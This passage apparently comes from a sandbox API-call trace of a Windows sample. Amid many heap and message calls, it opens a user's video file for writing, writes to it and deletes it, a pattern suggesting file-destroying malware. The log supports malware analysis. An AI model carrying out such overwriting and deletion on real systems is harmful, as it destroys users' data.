Flags=0x0, Size=0x20) returned 0x8deba0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.444] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.445] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.445] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.445] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.445] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0197.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bda08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0197.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\jyvwvjydk6qkt4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.446] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.446] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.447] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.447] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0197.447] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0197.447] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0197.447] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.448] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd348 [0197.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd348, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0197.448] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.448] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0197.448] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.449] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.449] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0197.449] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0197.449] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.449] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0197.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0197.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.450] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0197.450] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0197.450] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpFilePart=0x0) returned 0x59 [0197.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x1a9940a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0x90ae18 [0197.451] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\jyvwvjydk6qkt4.mkv")) returned 1 [0197.453] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x1a9940a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0 [0197.453] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0197.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0197.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0197.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.459] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0197.460] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0197.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0197.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, 